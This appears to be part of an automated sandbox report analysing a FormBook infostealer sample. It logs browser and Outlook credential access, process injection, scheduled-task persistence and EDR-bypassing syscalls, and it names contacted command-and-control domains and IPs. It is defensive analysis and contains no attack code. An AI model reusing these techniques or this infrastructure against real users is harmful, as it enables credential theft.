                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeQueries volume information: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.3311044242.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3313948379.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1092434861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3315893341.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1094683253.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1094905703.00000000044D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3313869495.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3313912525.0000000005FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.3311044242.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3313948379.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1092434861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3315893341.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1094683253.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1094905703.00000000044D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3313869495.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3313912525.0000000005FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		612
                Process Injection                		11
                Masquerading                		1
                OS Credential Dumping                		231
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		51
                Virtualization/Sandbox Evasion                		Security Account Manager51
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		612
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials123
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job32
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634632 Sample: 0t7MXNEfCg.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 70 www.031233435.xyz 2->70 72 www.publicblockchain.xyz 2->72 74 17 other IPs or domains 2->74 80 Antivirus detection for URL or domain 2->80 82 Antivirus / Scanner detection for submitted sample 2->82 84 Sigma detected: Scheduled temp file as task from temp location 2->84 88 6 other signatures 2->88 10 0t7MXNEfCg.exe 7 2->10         started        14 HrovwwypYVlFWB.exe 5 2->14         started        16 svchost.exe 2->16         started        signatures3 86 Performs DNS queries to domains with low reputation 72->86 process4 dnsIp5 54 C:\Users\user\AppData\...\HrovwwypYVlFWB.exe, PE32 10->54 dropped 56 C:\...\HrovwwypYVlFWB.exe:Zone.Identifier, ASCII 10->56 dropped 58 C:\Users\user\AppData\Local\...\tmp476F.tmp, XML 10->58 dropped 60 C:\Users\user\AppData\...\0t7MXNEfCg.exe.log, ASCII 10->60 dropped 94 Detected unpacking (changes PE section rights) 10->94 96 Detected unpacking (overwrites its own PE header) 10->96 98 Uses schtasks.exe or at.exe to add and modify task schedules 10->98 106 3 other signatures 10->106 19 RegSvcs.exe 10->19         started        22 powershell.exe 23 10->22         started        24 powershell.exe 23 10->24         started        26 schtasks.exe 1 10->26         started        100 Antivirus detection for dropped file 14->100 102 Multi AV Scanner detection for dropped file 14->102 104 Writes to foreign memory regions 14->104 28 schtasks.exe 1 14->28         started        30 RegSvcs.exe 14->30         started        62 127.0.0.1 unknown unknown 16->62 file6 signatures7 process8 signatures9 90 Maps a DLL or memory area into another process 19->90 32 nufnwZ9IW.exe 19->32 injected 92 Loading BitLocker PowerShell Module 22->92 35 WmiPrvSE.exe 22->35         started        37 conhost.exe 22->37         started        39 conhost.exe 24->39         started        41 conhost.exe 26->41         started        43 conhost.exe 28->43         started        process10 signatures11 76 Found direct / indirect Syscall (likely to bypass EDR) 32->76 45 EhStorAuthn.exe 32->45         started        process12 signatures13 108 Tries to steal Mail credentials (via file / registry access) 45->108 110 Tries to harvest and steal browser information (history, passwords, etc) 45->110 112 Modifies the context of a thread in another process (thread injection) 45->112 114 3 other signatures 45->114 48 nufnwZ9IW.exe 45->48 injected 52 firefox.exe 45->52         started        process14 dnsIp15 64 031233435.xyz 144.76.229.203, 53464, 53465, 53466 HETZNER-ASDE Germany 48->64 66 an05-prod-v.cdn-ng.net 43.251.56.78, 53468, 53469, 53470 WSN-TW-NET-ASWorldstarNetworkTW Taiwan; Republic of China (ROC) 48->66 68 8 other IPs or domains 48->68 78 Found direct / indirect Syscall (likely to bypass EDR) 48->78 signatures16

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.